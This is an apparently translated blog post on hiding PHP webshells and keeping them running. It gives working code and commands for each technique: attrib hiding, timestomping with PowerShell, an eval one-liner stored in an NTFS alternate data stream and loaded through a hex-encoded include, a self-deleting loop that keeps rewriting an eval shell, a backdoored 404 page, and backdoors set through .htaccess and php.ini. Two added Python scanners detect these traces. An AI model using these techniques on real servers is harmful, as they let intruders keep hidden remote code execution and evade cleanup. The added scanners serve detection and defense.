PHP backdoor hiding skills
2020-11-06 22:33:00 【Official account Bypass】
If you want your webshell to survive longer, evading antivirus detection is not enough; there are also some hiding techniques to be aware of, such as hiding files, modifying time attributes, and hiding file contents.
1. Hiding files
The attrib +s +a +h +r command adds the system, archive, hidden and read-only file attributes to the original folder.
attrib +s +a +h +r shell.php // hide shell.php file
2. Modifying file time attributes
When you try to hide a newly created file among a bunch of existing files, then besides giving it a confusing file name you also need to change the file's modification date.
# Change the modification time
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
# Change the access time
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
# Change the creation time
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
Use this command to view a file's properties:
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
Modify the creation and modification time of all files in a folder:
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
3. Using ADS to hide file contents
On the server, echo the payload into an alternate data stream (ADS). For example, if index.php is a normal web page file, we can do this:
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
This creates an invisible shell, hidden.jpg, which the regular file manager and the type, dir and del commands cannot find.
Using the include function, hex-encode the name index.php:hidden.jpg and include this ADS file, so that the one-line shell is parsed normally.
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4. The "undead" webshell
The undead webshell deletes its own file and stays resident as a process, recreating the hidden backdoor in a loop.
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); // delete this script's own file
while(1)
{
    file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); // create shell.php; an AV-evading one-liner is better here
    sleep(10); // interval between writes
}
?>
The simplest and most effective way to deal with it is to restart the service and delete the webshell file.
5. Middleware backdoor
Copy the compiled .so file to the modules folder, enable the backdoor module, and restart Apache. Sending a specific string in a specific parameter then triggers the backdoor.
GitHub project address:
https://github.com/VladRico/apache2_BackdoorMod
6. Hiding a backdoor in a 404 page
A 404 page mainly exists to improve the user experience, but it can also be used to hide a backdoor file.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
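A defender-side static check for the source-level traces that sections 3, 4 and 6 leave behind, added here as an example and not part of the original article: it decodes hex-packed include paths (flagging file:stream names), finds preg_replace patterns carrying the e modifier, and spots self-deleting scripts that keep writing files. The function name scan_php, the indicator labels and the sample file names are assumptions for illustration.

```python
import re

# include/require whose argument is pack('H*', '<hex>'): the file name is hidden as hex.
PACKED_INCLUDE = re.compile(
    r"""(?:include|require)(?:_once)?\s*\(?\s*pack\s*\(\s*['"]H\*['"]\s*,\s*['"]([0-9a-f]+)['"]""",
    re.IGNORECASE)
# preg_replace whose pattern literal ends in a modifier list containing "e" (evaluate).
PREG_EVAL = re.compile(r"""(?i:preg_replace)\s*\(\s*(['"])(.)(?:(?!\2).)*\2[a-zA-Z]*e[a-zA-Z]*\1""")
# A script that outlives the request, deletes itself and keeps writing files.
RESIDENT = [re.compile(p, re.IGNORECASE) for p in (
    r"ignore_user_abort\s*\(", r"unlink\s*\(\s*__FILE__\s*\)", r"file_put_contents\s*\(")]


def scan_php(source):
    """Return (indicator, detail) findings for one PHP source string."""
    findings = []
    for m in PACKED_INCLUDE.finditer(source):
        try:
            path = bytes.fromhex(m.group(1)).decode("latin-1")
        except ValueError:  # odd-length hex string: report it undecoded
            path = "<undecodable hex %s>" % m.group(1)
        # A colon past the drive-letter position means "file:stream", i.e. an NTFS ADS.
        kind = "packed-include-ads" if ":" in path[2:] else "packed-include"
        findings.append((kind, path))
    for m in PREG_EVAL.finditer(source):
        findings.append(("preg-replace-eval", m.group(0)))
    if all(p.search(source) for p in RESIDENT):
        findings.append(("self-deleting-writer",
                         "ignore_user_abort + unlink(__FILE__) + file_put_contents"))
    return findings


# Constructed samples: the include and 404 lines follow the page's snippets, job.php is
# a reduced resident loop with the payload replaced by a variable, clean.php is benign.
SAMPLES = {
    "index.php": "<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>",
    "404.php": """<?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); ?>""",
    "job.php": "<?php ignore_user_abort(1); unlink(__FILE__); "
               "while(1){ file_put_contents('shell.php',$p); sleep(10); } ?>",
    "clean.php": "<?php echo preg_replace('/e+/', 'x', $title); include('header.php'); ?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        for kind, detail in scan_php(src):
            print(f"{name}: {kind}: {detail}")
```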
7. Building a PHP backdoor with an .htaccess file
.htaccess is commonly used to leave backdoors and bypass blacklists. Create an .htaccess file in the upload directory with the following content; it takes effect without a restart, and uploaded png files are parsed as PHP.
AddType application/x-httpd-php .png
Alternatively, add a PHP parsing rule to .htaccess so that any file whose name contains 1 is parsed as PHP; an uploaded 1.txt is then parsed.
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
8. Hiding a backdoor file with php.ini
php.ini can specify files that are automatically parsed before and after the main file runs. This is commonly used for a shared page header and footer, and it can also be used to hide a PHP backdoor.
; Automatically add a file before each PHP document.
auto_prepend_file = "c:\tmp.txt"
; Automatically add a file after each PHP document.
auto_append_file = "c:\tmp.txt"
The service must be restarted for this to take effect; after that, visiting any PHP file reaches the webshell.
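An audit for the configuration changes described in sections 7 and 8, added here as an example and not part of the original article: it flags .htaccess directives that hand non-.php files to the PHP handler and php.ini settings that auto-include a file. The function names, the heuristic that a FilesMatch pattern containing "php" is legitimate, and the sample text are assumptions for illustration.

```python
import re

PHP_TYPE = re.compile(r"application/x-httpd-php", re.I)

def audit_htaccess(text):
    """Flag directives that hand non-.php files to the PHP handler (heuristic)."""
    findings, scope = [], None
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        opened = re.match(r'<FilesMatch\s+"?([^">]+)"?\s*>', line, re.I)
        if opened:
            scope = opened.group(1)          # remember the pattern we are inside
        elif re.match(r"</FilesMatch>", line, re.I):
            scope = None
        elif line.startswith("#") or not PHP_TYPE.search(line):
            continue
        elif re.match(r"Add(Type|Handler)\s", line, re.I):
            exts = [e for e in line.split()[2:] if e.lower().lstrip(".") != "php"]
            if exts:
                findings.append((n, "PHP handler mapped to " + " ".join(exts)))
        elif re.match(r"SetHandler\s", line, re.I) and (scope is None or "php" not in scope.lower()):
            findings.append((n, "SetHandler PHP inside FilesMatch %r" % scope))
    return findings

def audit_php_ini(text):
    """Report auto_prepend_file / auto_append_file settings that name a file."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split(";", 1)[0].strip()  # ';' starts a php.ini comment
        m = re.match(r"(auto_(?:prepend|append)_file)\s*=\s*(.*)$", line, re.I)
        if m:
            value = m.group(2).strip("\"' ")
            if value.lower() not in ("", "none"):  # empty or "none" disables it
                findings.append((n, m.group(1).lower(), value))
    return findings

# Constructed samples built from the directives shown above, plus one benign block.
HTACCESS = r'''AddType application/x-httpd-php .png
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.php$">
SetHandler application/x-httpd-php
</FilesMatch>'''
PHP_INI = r'''auto_prepend_file = "c:\tmp.txt"
auto_append_file ='''

if __name__ == "__main__":
    print(audit_htaccess(HTACCESS), audit_php_ini(PHP_INI))
```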
This article is from WeChat official account. - Bypass(Bypass--).